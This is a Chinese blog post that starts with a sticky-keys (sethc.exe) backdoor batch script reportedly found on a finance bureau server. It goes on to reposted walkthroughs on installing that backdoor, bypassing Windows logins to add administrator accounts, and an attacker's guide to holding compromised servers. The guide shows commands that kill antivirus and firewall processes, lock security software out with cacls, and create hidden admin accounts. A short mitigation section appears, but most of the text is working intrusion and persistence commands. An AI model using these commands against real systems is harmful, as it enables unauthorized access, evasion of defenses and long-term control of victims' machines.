東川印記

一本東川,笑看爭龍斗虎;寰茫兦者,度橫佰昧人生。

财政局一台服务器新发现

2011年5月25日星期三



今天在财政局一台服务器上发现的。。。。。

 

@echo off
cls
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
echo Shift后门
echo.sproink

@copy c:\windows\explorer.exe c:\windows\system32\sethc.exe

@copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe

@attrib c:\windows\system32\sethc.exe +h

@attrib c:\windows\system32\dllcache\sethc.exe +h

echo 使用方法:本文件执行完毕后,
echo 在终端界面按Shift 5次即可登陆系统!
echo.
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
echo 完成百分之 50
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
echo 完成百分之 80
attrib c:\windows\system32\sethc.exe +h
echo 完成百分之 90
attrib c:\windows\system32\dllcache\sethc.exe +h
echo 完成百分之 100
cls
echo.
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo 后门安装完毕!
echo.
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
echo. & pause
exit

 

百度一下 你就知道

 

首先介绍一下sethc.exe入侵的原理吧:

sethc.exe就是win系统里自带的鸡肋功能,所谓的粘滞键, 哎 没一点P用

反而被一些所谓的黑客们,用来 在入侵别人服务器后 给服务器上装后门所用.

用COPY命令将cmd.exe复制为sethc.exe,这样在登陆界面是连按五下左SHIFT就可以调出我们可爱的CMD命令

窗口SHELL(系统权限)了!----------------------copy cmd.exe sethc.exe
最后重启后进入登陆介面...现在我们连续按五下左SHIFT..出现了个cmd命令窗口,它是shell(系统权

限)....
使用DOS命令:net user administrator 123456 就可以把管理员密码改成:123456了..试下使用123456就可

以登陆了!..
比如也可以利用CMD替换掉logon.scr等待屏保获得CMDSHELL也一种方法!

解决的方法:

很多人的服务器都被黑客入侵.并被利用了系统的这个漏洞做了后门,在这里我说一下在windows2003

server系统中这个后门的简单处理方法:

1.删除C:\WINDOWS\system32和C:\WINDOWS\system32\dllcache这两个目录的sethc.exe文件,(注

意:dllcache这个目录是隐藏的,要在文件夹选项里选择"显示所有文件和文件夹"把"隐藏受系统保护的操作

系统文件"的选择取消才能看得到).

2.使用权限来约束这两个文件C:\WINDOWS\system32和C:\WINDOWS\system32\dllcache这两个目录的

sethc.exe文件,(注意:dllcache这个目录是隐藏的,要在文件夹选项里选择"显示所有文件和文件夹"把"隐

藏受系统保护的操作系统文件"的选择取消才能看得到). 在权限里设置为所有用户(Everyone)禁止运行


粘滞键漏洞,按5下shift后,windows就执行了system32下的sethc.exe

Windows的粘滞键。是按5下shift后,windows就执行了system32下的sethc.exe。即使
在3389中,都可以弹出!!
它本来是为不方便按组合键的人设计的。 如果我们把那个sethc.exe替换成我们想要的其它文件,比如说cmd.exe,那么就可以用cmd命令了.
其实写的批处理就可以解决了 又不麻烦
@echo off
del /q %systemroot%\system32\dllcache\sethc.exe
del /q %systemroot%\system32\sethc.exe
copy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe
copy %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe
我把它保存为5shift.bat。当我们运行它的时候,sethc.exe 就被换成了改了名的cmd.exe了。
可能由于cmd也是系统文件,所以替换是并没有弹出文件保护。呵呵。
个人感觉这个后门非常实用(特别是3389肉鸡!)。哪个管理员会考虑到这种后门呢
然后你就可以创建用户了
net user [UserName [Password | *] [options] [/domain]
net user [UserName {Password | *} /add [options] [/domain]
net user [UserName [/delete] [/domain]
[color=Red][b]把sethc.exe文件的NTFS权限设置一下就安全了.[/b][/color]


 

用shift键破解windows的登录密码.
首先用DOS盘启动.然后转到c:\windows\system32\下面.输入如下命令:
copy sethc.exe sethc2.exe 备份粘滞键文件
copy cmd.exe sethc.exe 用cmd.exe覆盖sethc.exe
然后重启.当需要输入密码的时候按5下shift就打开cmd窗口,然后输入如下密码:
net user admin admin /add 添加admin用户,密码是admin
net localgroup administrators admin /add 提升为超级管理员


 

当各位搞到一个shell,或者能远程执行命令之后,如何提权并保持肉鸡长期上线是一个难题。本人仅根据个人经验,旁敲侧击的谈几个常用命令,算是抛砖引玉,欢迎大家前来指导交流!

  首先,提一下搞肉鸡,方法很多,1433、135、21,80、3389、4389,5900等端口都是常用的(有兴趣的可以下载专门的扫描器或者s扫描器)。

  另外,说一下肉鸡的系统环境,一般都是服务器,所以杀毒软件、防火墙啥的相对来说还是比较牢固的,所以如何干扰并跳过这些保护也就是提权的关键。

  最后,如何保持这个肉鸡长久上线,是目的所在,显然需要设置后门或者种植木马。

  注:下文对喜欢3389直接远程登陆的用户不适用(不过善意提醒你,你留下了登陆等很多日志,呵呵);

  常见命令, 如ipconfig、netstat等这儿不涉及,大家都会。

  下面转入正文。

  1.ver

  作用:查看系统版本

  实例:ver

  说明:提权第一步就是查看这个是个人机器还是服务。

  2.tasklist

  作用:列出机器的所有进程

  实例:tasklist

  说明:用它你就可以知道肉鸡的杀毒软件、防火墙是啥。后面就好办了,给他中马的时候,首先本地测试,免杀,再种上去,防止中马不成功,或者留下查杀记录。(笨的办法可以直接停止杀毒软件,见后面命令。不过这样管理员就肯定知道自己中木马了,你长久控制肉鸡的目标也就要破碎了)。

  3.taskkill

  作用:杀制定名字或者pid的进程

  实例: taskkill /f /im 360safe.exe 或者 taskkill /f /pid 3389

  说明:使用它可以结束防火墙进程啥的。因为它阻止你打开网络端口,或者以这台肉鸡为代理进行其他扫描、入侵啥的。当然,也可以结束杀毒软件等。

  4.net start

  作用:列出机器所有服务或者启动某个指定的服务

  实例: net start 或者 net start w3svc(启动iis)

  说明:通过它列出的所有服务可以看到服务器安装的杀毒软件,以及开放哪些服务。比如有瑞星服务,则你单独用taskkill是无法结束杀毒进程的,只能先停止服务。

  比如有 Terminal Services则可以通过net u_ser(_去掉,因为华夏屏蔽)增加一个帐号,再3389登陆。

  5.net stop

  作用:停止指定的服务

  实例: net stop net stop sharedaccess (停止windows防火墙)

  说明:结合net start使用

6.cacls

  作用:设置文件权限

  实例: cacls c:\windows\mm.exe /P everyone:R 或者cacls c:\progra~1\rising\ravmond.exe /d:everyone

  说明:可以用它来保护木马文件或者禁止某个程序(如杀毒软件)运行。这个在有时候,我们taskkill某个进程,发现马上又起来了比较有用。

  设置为/d:everyone,任何人无法访问,自然没法再运行。(这一招也可以用来杀木马或者免疫:可参看http://hi.baidu.com/it%5Fsecurity/blog/item/f23295008170bb001c958348.html)

  7.&

  作用:连续执行多个命令

  实例:del c:\windows\system32\sethc.exe & del c:\windows\system32\dllcache\sethc.exe & copy c:\windows\explorer.exe c:\windows\system32\dllcache\sethc.exe & copy c:\windows\explorer.exe c:\windows\system32\sethc.exe

  说明:上面是最简单的shift按多次后跳出资源管理器下后门。直接拷贝一次执行即可,不用批处理拉。

  注:上面操作,你如果一步一步操作,早就被系统还原了,没法实现文件替换、设置后门。

  8.echo y|

  作用:当命令行执行碰到提示“是否确定(Y/N)?”的时候自动输入Y(因为你没法一边执行命令一边还可以选择y 或n)

  实例:echo y>echo y>cacls c:\windows\mm.exe /P everyone:R;

  说明:将上面shift按多次后门简化:echo y | copy c:\windows\explorer.exe c:\windows\system32\dllcache\sethc.exe & echo y | copy c:\windows\explorer.exe c:\windows\system32\sethc.exe

  (直接拷贝的时候会提示是否覆盖,这儿通过echo y解决)

  9.net us_er/group(_去掉,因为华夏屏蔽)

  作用:开帐号,并加入到组(一般是administrators组)

  实例:net u_ser admin$ "123456" & net local_group administrators admin$ /add

  说明:以上通过 &操作符又是一步到位。另外,通过这种方法建立的帐号,仅一次隐藏。如长期隐藏,可参考:http://hi.baidu.com/it%5Fsecurity/blog/item/9bab86a0a60fac8d471064b5.html

  10.shutdown

  作用:重启或者关闭机器,或者取消关机

  实例:shutdown -r -t 0(立即重启)

  说明:该重启的时候重启吧,一般开服务或者中马之后。

  以上命令有些2000下可能无法运行,xp,2003下肯定ok。

  后续,我再总结一下如何通过命令行来中马。

  主要是通过ftp或者http下载或传输文件(完全命令行方式),同时也呼吁大家多共享自己得经验,共同提高。



 

id: 925236076
title: 财政局一台服务器新发现
publishTime: 1306286993150
classId: 88735822
moveForm: NONE

没有评论 :

发表评论